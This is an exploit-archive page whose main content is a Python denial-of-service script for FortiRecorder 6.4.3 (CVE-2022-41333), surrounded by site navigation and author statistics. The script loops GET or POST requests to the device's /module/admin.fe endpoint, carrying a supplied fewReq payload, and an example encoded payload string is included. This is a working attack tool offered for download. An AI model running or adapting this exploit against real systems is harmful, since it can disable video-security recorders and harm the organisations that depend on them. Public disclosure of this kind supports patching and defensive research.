FortiRecorder 6.4.3 Denial Of Service

FortiRecorder 6.4.3 Denial Of Service: Posted Apr 10, 2023; Authored by Mohammed Adel; FortiRecorder version 6.4.3 suffers from a denial of service vulnerability.; tags | exploit, denial of service; advisories | CVE-2022-41333; SHA-256 | ddd5206cc8a7aaedd4b28593e37c972a29c70867b1b36fc1ccdd23aff8d8cbfb; Download | Favorite | View

FortiRecorder 6.4.3 Denial Of Service

# Exploit Title: FortiRecorder 6.4.3 - Denial of Service
# Google Dork: N/A
# Date: 13/03/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/network-based-video-security/forticam-fortirecorder
# Version: 6.4.3 and below && 6.0.11 to 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-41333
# Security Advisory: https://www.fortiguard.com/psirt/FG-IR-22-388
# Technical Analysis: https://medium.com/@0xpolar/cve-2022-41333-71eb289d60b5

import requests
import warnings
import sys
from urllib.parse import unquote
warnings.filterwarnings('ignore', message='Unverified HTTPS request')

def POST(target, req_type, payload):
    print("[+] Target      : "+target)
    print("[+] Request Type: POST")
    print("[+] Payload     : " +payload)
    post_url = target+"/module/admin.fe"
    post_headers = {"User-Agent": "CVE-2022-41333", "Content-Type": "application/x-www-form-urlencoded"}
    url_decoder = unquote(payload)
    full_payload = "fewReq="+url_decoder
    while True:
        r = requests.post(post_url, headers=post_headers, data=full_payload, verify=False)
        if "Failed: Access denied" in r.text:
            print("[+] Payload Sent.")
        else:
            print("[!] Something went wrong!")
            print(r.text)

def GET(target, req_type, payload):
    print("[+] Target      : "+target)
    print("[+] Request Type: GET")
    print("[+] Payload     : " +payload)
    while True:
      url = target+"/module/admin.fe?fewReq="+payload
      headers = {"User-Agent": "CVE-2022-41333", "Connection": "close"}
      r = requests.get(url, headers=headers, verify=False)
      if "Failed: Access denied" in r.text:
          print("[+] Payload Sent.")
      else:
          print("[!] Something went wrong!")
          print(r.text)


print("[+] Starting ..")
target = str((sys.argv[1])) # https://fortirecorder.fortidemo.com
req_type = str((sys.argv[2])) # POST or GET
payload = str((sys.argv[3])) # :B:JSsrJW16blB9dXp8ayJMZmxcfnJee3J2cTltem5efGt2cHEiLio5amx6bXF+cnoi


if "post" in req_type.lower():
    if "https" in target.lower() or "http" in target.lower():
        POST(target, req_type, payload)
    else:
        print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
elif "get" in req_type.lower():
    if "https" in target.lower() or "http" in target.lower():
        GET(target, req_type, payload)
    else:
        print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
else:
    print("[!] Invalid Request Type.")

Top Authors In Last 30 Days

Red Hat 269 files
Ubuntu 99 files
Gentoo 29 files
indoushka 19 files
Debian 17 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
jheysel-r7 2 files
Pierre Kim 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,505)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,383)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,686)
UNIX (9,430)
UnixWare (187)
Windows (6,667)
Other

FortiRecorder 6.4.3 Denial Of Service

FortiRecorder 6.4.3 Denial Of Service

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

FortiRecorder 6.4.3 Denial Of Service

Share This

FortiRecorder 6.4.3 Denial Of Service

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems